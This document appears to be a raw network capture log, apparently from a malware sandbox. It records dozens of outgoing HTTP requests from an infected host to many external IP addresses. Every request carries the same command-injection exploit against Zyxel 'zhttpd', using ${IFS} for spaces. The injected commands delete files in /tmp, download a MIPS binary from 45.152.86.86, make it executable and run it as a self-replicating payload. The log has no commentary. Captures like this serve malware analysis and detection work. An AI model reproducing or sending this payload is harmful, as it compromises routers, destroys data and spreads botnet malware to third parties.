                              Mar 31, 2024 08:41:08.538479090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1043192.168.2.135442061.86.148.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538518906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1044192.168.2.1333744181.243.208.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538546085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1045192.168.2.133468835.34.85.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538592100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1046192.168.2.1348774157.34.228.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538660049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1047192.168.2.1360310164.64.148.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538671017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1048192.168.2.1356764153.62.122.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538702965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1049192.168.2.1350500199.129.209.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538768053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1050192.168.2.135709288.237.138.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538803101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1051192.168.2.1347848189.40.43.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538846970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1052192.168.2.13594104.140.145.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538901091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1053192.168.2.133992687.243.158.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538937092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1054192.168.2.135960472.25.205.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538961887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1055192.168.2.136005866.23.114.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539021969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1056192.168.2.135728690.230.105.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539057016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1057192.168.2.1335622194.125.14.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539097071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1058192.168.2.1355848204.69.235.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539127111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1059192.168.2.1348542223.99.226.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539165974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1060192.168.2.1345240118.175.136.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539216042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1061192.168.2.134195078.89.103.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539275885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1062192.168.2.1340518139.204.19.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539278984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1063192.168.2.135062884.248.224.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539330959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1064192.168.2.1345320135.145.71.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539356947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1065192.168.2.1348682147.31.104.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539376020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1066192.168.2.1360494204.53.46.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539416075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1067192.168.2.133458293.164.118.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539454937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1068192.168.2.1354904207.83.208.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539525032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1069192.168.2.1347964207.239.150.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539525032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1070192.168.2.134015439.166.251.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539592028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1071192.168.2.133800050.155.143.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539603949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1072192.168.2.1337956212.247.110.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539622068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1073192.168.2.1339758111.33.54.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539648056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1074192.168.2.134170842.84.167.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539706945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1075192.168.2.1340598103.115.60.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539741039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1076192.168.2.1346826119.145.97.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539776087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1077192.168.2.1356972113.73.143.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539808989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1078192.168.2.1356614209.188.140.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539875984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1079192.168.2.1351124126.68.127.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539901972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1080192.168.2.133339895.1.35.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539936066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1081192.168.2.1339380171.117.139.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.539974928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1082192.168.2.1345782202.154.7.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540014982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1083192.168.2.1335980103.207.211.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540059090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1084192.168.2.1343194107.225.50.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540090084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1085192.168.2.1357442172.146.228.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540158987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1086192.168.2.1354736169.129.72.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540200949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1087192.168.2.133908282.82.87.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540237904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1088192.168.2.1336004144.231.10.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540282965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1089192.168.2.1341536192.231.161.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540324926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1090192.168.2.134015273.112.192.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540348053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1091192.168.2.133380434.48.122.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540396929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1092192.168.2.135941474.199.59.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540422916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1093192.168.2.1358648147.14.162.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540452003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1094192.168.2.1337786188.126.131.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540522099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1095192.168.2.133631418.220.243.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540584087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1096192.168.2.1342110144.40.45.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540595055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1097192.168.2.134225244.203.217.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540652990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1098192.168.2.1358284139.34.220.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540693045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1099192.168.2.134505686.44.195.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540731907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1100192.168.2.134859488.132.50.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540765047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1101192.168.2.1354696119.216.245.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540815115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1102192.168.2.1346928110.227.164.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540829897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1103192.168.2.1342574181.208.13.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540873051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1104192.168.2.1348488163.106.80.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540920019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1105192.168.2.1339802125.141.235.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.540977955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1106192.168.2.1357970147.108.79.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541008949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1107192.168.2.133927657.10.155.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541054964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1108192.168.2.1347296172.138.204.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541112900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1109192.168.2.134595471.58.231.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541129112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1110192.168.2.1336242133.39.208.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541168928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1111192.168.2.1333158205.33.107.181443
                              TimestampBytes transferredDirectionData
